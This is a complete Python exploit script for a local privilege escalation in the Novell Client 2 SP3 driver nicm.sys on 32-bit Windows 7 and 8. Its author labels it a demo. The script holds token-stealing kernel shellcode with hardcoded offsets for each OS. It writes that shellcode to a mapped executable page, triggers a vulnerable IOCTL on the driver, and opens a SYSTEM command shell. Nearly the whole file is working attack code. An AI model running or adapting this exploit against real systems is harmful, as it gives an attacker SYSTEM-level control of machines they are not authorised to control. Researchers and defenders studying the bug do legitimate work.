# Novell Client 2 SP3 Privilege escalation exploit
# Tested on Windows 7 and 8 (x86) / nicm.sys 3.1.11.0
# Thanks to Master Ryujin :)
# The first public information I have seen about this bug was from Nikita Tarakanov @NTarakanov (I am not sure weather there was anything else public)
# Exploit for DEMO purposes :)
# Does not bypass SMEP on Windows 8
# Metasploit module working against Windows 7: http://www.exploit-db.com/exploits/26452/
from
ctypes
import
*
import
sys,struct,os
from
optparse
import
OptionParser
kernel32
=
windll.kernel32
ntdll
=
windll.ntdll
if
__name__
=
=
'__main__'
:
usage
=
"%prog -o <target>"
parser
=
OptionParser(usage
=
usage)
parser.add_option(
"-o"
,
type
=
"string"
,
action
=
"store"
, dest
=
"target_os"
,
help
=
"Available target operating systems: WIN7, WIN8"
)
(options, args)
=
parser.parse_args()
OS
=
options.target_os
if
not
OS
or
OS.upper()
not
in
[
'WIN7'
,
'WIN8'
]:
parser.print_help()
sys.exit()
OS
=
OS.upper()
if
OS
=
=
"WIN7"
:
_KPROCESS
=
"\x50"
# Offset for Win7
_TOKEN
=
"\xf8"
# Offset for Win7
_UPID
=
"\xb4"
# Offset for Win7
_APLINKS
=
"\xb8"
# Offset for Win7
steal_token
=
"\x52"
+
\
"\x53"
+
\
"\x33\xc0"
+
\
"\x64\x8b\x80\x24\x01\x00\x00"
+
\
"\x8b\x40"
+
_KPROCESS
+
\
"\x8b\xc8"
+
\
"\x8b\x98"
+
_TOKEN
+
"\x00\x00\x00"
+
\
"\x89\x1d\x00\x09\x02\x00"
+
\
"\x8b\x80"
+
_APLINKS
+
"\x00\x00\x00"
+
\
"\x81\xe8"
+
_APLINKS
+
"\x00\x00\x00"
+
\
"\x81\xb8"
+
_UPID
+
"\x00\x00\x00\x04\x00\x00\x00"
+
\
"\x75\xe8"
+
\
"\x8b\x90"
+
_TOKEN
+
"\x00\x00\x00"
+
\
"\x8b\xc1"
+
\
"\x89\x90"
+
_TOKEN
+
"\x00\x00\x00"
+
\
"\x5b"
+
\
"\x5a"
+
\
"\xc2\x08"
sc
=
steal_token
else
:
_KPROCESS
=
"\x80"
# Offset for Win8
_TOKEN
=
"\xEC"
# Offset for Win8
_UPID
=
"\xB4"
# Offset for Win8
_APLINKS
=
"\xB8"
# Offset for Win8
steal_token
=
"\x52"
+
\
"\x53"
+
\
"\x33\xc0"
+
\
"\x64\x8b\x80\x24\x01\x00\x00"
+
\
"\x8b\x80"
+
_KPROCESS
+
"\x00\x00\x00"
+
\
"\x8b\xc8"
+
\
"\x8b\x98"
+
_TOKEN
+
"\x00\x00\x00"
+
\
"\x8b\x80"
+
_APLINKS
+
"\x00\x00\x00"
+
\
"\x81\xe8"
+
_APLINKS
+
"\x00\x00\x00"
+
\
"\x81\xb8"
+
_UPID
+
"\x00\x00\x00\x04\x00\x00\x00"
+
\
"\x75\xe8"
+
\
"\x8b\x90"
+
_TOKEN
+
"\x00\x00\x00"
+
\
"\x8b\xc1"
+
\
"\x89\x90"
+
_TOKEN
+
"\x00\x00\x00"
+
\
"\x5b"
+
\
"\x5a"
+
\
"\xc2\x08"
sc
=
steal_token
kernel_sc
=
"\x14\x00\x0d\x0d"
kernel_sc
+
=
"\x41\x41\x41\x41"
kernel_sc
+
=
"\x41\x41\x41\x41"
kernel_sc
+
=
"\x41\x41\x41\x41"
kernel_sc
+
=
"\x41\x41\x41\x41"
kernel_sc
+
=
"\x18\x00\x0d\x0d"
kernel_sc
+
=
"\x41\x41\x41\x41"
kernel_sc
+
=
"\x41\x41\x41\x41"
kernel_sc
+
=
"\x41\x41\x41\x41"
kernel_sc
+
=
"\x28\x00\x0d\x0d"
kernel_sc
+
=
sc
print
"[>] Novell Client 2 SP3 privilege escalation for Windows 7 and Windows 8."
print
"[>] Finding the driver."
GENERIC_READ
=
0x80000000
GENERIC_WRITE
=
0x40000000
OPEN_EXISTING
=
0x3
DEVICE
=
'\\\\.\\nicm'
device_handler
=
kernel32.CreateFileA(DEVICE, GENERIC_READ|GENERIC_WRITE,
0
,
None
, OPEN_EXISTING,
0
,
None
)
EVIL_IOCTL
=
0x00143B6B
# Vulnerable IOCTL
retn
=
c_ulong()
inut_buffer
=
0x0d0d0000
inut_size
=
0x14
output_buffer
=
0x0
output_size
=
0x0
baseadd
=
c_int(
0x0d0d0000
)
MEMRES
=
(
0x1000
|
0x2000
)
PAGEEXE
=
0x00000040
Zero_Bits
=
c_int(
0
)
RegionSize
=
c_int(
0x1000
)
write
=
c_int(
0
)
print
"[>] Allocating memory for our shellcode."
dwStatus
=
ntdll.NtAllocateVirtualMemory(
-
1
, byref(baseadd),
0x0
, byref(RegionSize), MEMRES, PAGEEXE)
print
"[>] Writing the shellcode."
kernel32.WriteProcessMemory(
-
1
,
0x0d0d0000
, kernel_sc,
0x1000
, byref(write))
if
device_handler:
print
"[>] Sending IOCTL to the driver."
dev_io
=
kernel32.DeviceIoControl(device_handler, EVIL_IOCTL, inut_buffer, inut_size, output_buffer, output_size, byref(retn),
None
)
print
"[>] Dropping to a SYSTEM shell."
os.system(
"cmd.exe /K cd C:\\windows\\system32"
)